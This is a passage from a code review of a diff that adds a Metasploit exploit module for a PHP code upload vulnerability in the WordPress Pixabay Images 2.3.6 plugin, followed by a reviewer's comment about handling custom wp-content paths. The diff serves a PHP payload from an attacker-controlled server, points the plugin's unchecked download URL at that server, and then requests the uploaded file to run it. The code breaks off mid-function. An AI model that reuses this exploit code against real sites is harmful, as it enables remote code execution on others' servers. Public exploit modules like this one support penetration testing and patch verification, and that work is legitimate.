modules/exploits/unix/webapp/php_wordpress_pixabay_images.rb

```diff
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit3 < Msf::Exploit::Remote
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress Pixabay Images PHP Code Upload',
+      'Description'    => %q{
+          This module exploits multiple vulnerabilities in the Wordpress plugin Pixabay
+          Images 2.3.6. The plugin does not check the host of a provided download URL
+          which can be used to store and execute malicious PHP code on the system.
+      },
+
+      'Author'	=>
+        [
+          'h0ng10', # Discovery, Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-01.txt' ]
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['pixabay-images 2.3', {}]],
+      'DefaultTarget'  => 0,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+        },
+      'DisclosureDate' => 'Jan 19 2015'
+      ))
+
+      register_options(
+        [
+          OptString.new('DOWNURI', [ false,  "An alternative URI to request the PHP payload from"]),
+        ], self.class)
+
+  end
+
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+      vprint_status("#{rhost}:#{rport} - URI requested: #{request.inspect}")
+      print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+      send_response(cli, payload.encoded)
+  end
+
+  def generate_payload_uri
+
+      # Did the user provide his own url? If yes use it...
+      return datastore['DOWNURI'] if datastore['DOWNURI']
+
+      # Create a custom URI
+      custom_uri = "http://" + datastore['SRVHOST']
+
+      if datastore['SRVPORT'] != "80" then
+          custom_uri += ":" + datastore['SRVPORT'].to_s
+      end
+
+      custom_uri += normalize_uri(get_resource.chomp('/')) + ".php"
+      return custom_uri
+  end
+
+
+  def call_payload(file_name, epoch_time)
+      real_fn = "#{file_name}_#{epoch_time.to_s}.php"
+      res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', real_fn),
```

Comment:
please use `wordpress_url_wp_content` or add a `wordpress_url_uploads` to https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/http/wordpress/uris.rb

This method is needed to handle custom wp-content dirs